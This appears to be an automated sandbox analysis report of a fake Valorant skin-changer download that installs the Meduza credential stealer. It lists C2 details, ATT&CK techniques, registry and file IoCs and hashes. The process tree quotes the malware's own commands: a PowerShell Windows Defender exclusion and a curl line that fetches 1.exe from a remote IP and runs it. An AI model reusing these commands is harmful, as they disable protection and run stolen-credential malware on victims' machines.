meduza | hxxps://valorantskinchanger[.]pro/about[.]html

Analysis

max time kernel
138s
max time network
137s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
08/03/2025, 07:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://valorantskinchanger.pro/about.html

Score

10^/10

meduza 1 collection discovery execution spyware stealer

Malware Config

Extracted

Family

meduza

Botnet

45.93.20.15

Attributes

anti_dbg
true
anti_vm
true
build_name
1
extensions
.txt; .doc; .xlsx
grabber_maximum_size
4194304
port
15666
self_destruct
false

Signatures

Meduza
Meduza is a crypto wallet and info stealer written in C++.
stealer meduza

Meduza Stealer payload 1 IoCs

resource	yara_rule
behavioral1/files/0x000f000000023b7b-315.dat	family_meduza

Meduza family
meduza

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2236	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
92	812	curl.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation	Valorant_Skin_Changer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation	1.exe

Executes dropped EXE 2 IoCs

pid	Process
5720	Valorant_Skin_Changer.exe
1256	1.exe

Loads dropped DLL 1 IoCs

pid	Process
5720	Valorant_Skin_Changer.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
44	ipinfo.io
45	ipinfo.io
94	api.ipify.org
95	api.ipify.org

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Valorant_Skin_Changer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

pid	Process
940	msedge.exe
940	msedge.exe
1992	msedge.exe
1992	msedge.exe
1560	identity_helper.exe
1560	identity_helper.exe
6044	msedge.exe
6044	msedge.exe
2236	powershell.exe
2236	powershell.exe
1256	1.exe
1256	1.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	3276	7zG.exe
Token: 35	3276	7zG.exe
Token: SeSecurityPrivilege	3276	7zG.exe
Token: SeSecurityPrivilege	3276	7zG.exe
Token: SeDebugPrivilege	2236	powershell.exe
Token: SeDebugPrivilege	1256	1.exe
Token: SeImpersonatePrivilege	1256	1.exe
Token: SeDebugPrivilege	5952	taskmgr.exe
Token: SeSystemProfilePrivilege	5952	taskmgr.exe
Token: SeCreateGlobalPrivilege	5952	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe

Suspicious use of SendNotifyMessage 58 IoCs

pid	Process
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
1992	msedge.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe
5952	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5720	Valorant_Skin_Changer.exe
5720	Valorant_Skin_Changer.exe
5720	Valorant_Skin_Changer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 5112	1992	msedge.exe	87
PID 1992 wrote to memory of 5112	1992	msedge.exe	87
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 1680	1992	msedge.exe	88
PID 1992 wrote to memory of 940	1992	msedge.exe	89
PID 1992 wrote to memory of 940	1992	msedge.exe	89
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90
PID 1992 wrote to memory of 4896	1992	msedge.exe	90

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	1.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://valorantskinchanger.pro/about.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd84b746f8,0x7ffd84b74708,0x7ffd84b74718
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2968 /prefetch:8
  2⤵
  PID:4896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  2⤵
  PID:3188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
  2⤵
  PID:4480
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:2896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5984 /prefetch:1
  2⤵
  PID:1160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5292 /prefetch:8
  2⤵
  PID:3188
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  2⤵
  PID:1120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,9098430501380728888,15535421502408830465,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6044

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4212

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5244

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\" -spe -an -ai#7zMap24788:110:7zEvent21284
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3276

C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe
"C:\Users\Admin\Downloads\ValorantSkin_Changer_2.7\Valorant_Skin_Changer.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5720
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp\1.exe'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Temp\ & curl -o 1.exe http://147.45.44.170/1.exe & start 1.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3608
- - C:\Windows\SysWOW64\curl.exe
    curl -o 1.exe http://147.45.44.170/1.exe
    3⤵
    - Downloads MZ/PE file
    PID:812
- - C:\Windows\Temp\1.exe
    1.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Accesses Microsoft Outlook profiles
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - outlook_office_path
    - outlook_win_path
    PID:1256

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6738f4e2490ee5070d850bf03bf3efa5

SHA1
fbc49d2dd145369e8861532e6ebf0bd56a0fe67c

SHA256
ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab

SHA512
2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
93be3a1bf9c257eaf83babf49b0b5e01

SHA1
d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a

SHA256
8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348

SHA512
885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
96B

MD5
6ba1b773ffc22f78dacb9c0ac895c45e

SHA1
a0eb81ec16ac9e21cc808bf3a341aecb4e534383

SHA256
7bb8bb840cc6b39a90443d86a769231fec139c97cc45e2d331010573f33c8829

SHA512
760cf2a201432cd790e2a636d9bd196d0bcac8439b7d91ac157029a9a861b65f907c0be8c54e2df021ba2bf81a00e54e23645fa7c7d737b439362d80a0d29c07

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
aa01d8366b7cef38a29d66c38a03f988

SHA1
b5d5c9d9d4d25fb79c8321f90e939d71434cb816

SHA256
abb3a4b2e89f488f9b6a83733a9dfcac4d01fefb6579ececd210e31f0e6c0cac

SHA512
a057d1e4b28ccb48c94077635dd5d7f8b9af747f7e905d556612180a9e9f3826ac7ac1bfe4ebcb68dc0ad63624f614ace55c34469a0716bb05c4f82ca624a57a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
334B

MD5
1b68d83ef41d1c6bd688cc4eed94e431

SHA1
cdccdfe8dcf66565b9b8d03d3043411566e8e5c9

SHA256
8ede4bbf571bdb343583fba0cb741d33253d84d098ce51ed0b52665cc80ff17d

SHA512
5006c9568ef9463da0046db6c6f85e9c24cf68708f2497f53bb8096e641937b99125ac0b5d1c1d50d839314f3fd846fa376fd7034bd4242c8b2029da6637f335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
842B

MD5
7da05e63aa2363f8bf8bbcd7b368c7d7

SHA1
c8823d60f47e087d8ecbb0b689f2d5145f3449c3

SHA256
717a739cdbe0a9bd2e0421718594aaa7c70fe500c07052d7aa7303c07f2cec6d

SHA512
31691eaec6d6c3277b7ff368804685dbfee0e02ee0db574f046b82eb96dab278da7090c11d17d2c15be1b0793a4efb58e79a1c4bc11f3f558a78466401d3311a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9494cf2e2341c108e5f9bce91efd8bf6

SHA1
4f052d1800f1746c65fa6f89376c496c57805f5e

SHA256
2f97889a4d0d4d06d8e0580eb373d89c5bb09735b638e9690635f5151df623f0

SHA512
fc43bb0d5eb900b9e27c13e0e0069c70acfdf051612fdd94fc328870de2ee7358be01aba02486979fe46e3eb089ca8efc5d656bb9b46ee97ffcbb1ec472ff2ab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
d85110f97de550212d7a6df075ad9bc9

SHA1
6f9861d705765705fe6d96a62bfbb3a4972812ab

SHA256
52eb3b94d2e68a7dc06a29932fcdefb75d237642af0106109eaa6c3f6c7187ed

SHA512
b05ce358d33dc1e944fb25693c612b8bc0f82c5dce66022fc30946211dccdf465df85fdbe24a8b9edaf5b38d57b10c444178b586ddd9e5f1f96e86809daffaa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
68d4a7a404aa0c923bb27aacc9f83ded

SHA1
82cf7ad829ac6f63024cac12b0a4494ab53daaf5

SHA256
e0f937c4139f6f62e9db6cde0b9624fd7d1cd094be7252e46a08f91c0768e768

SHA512
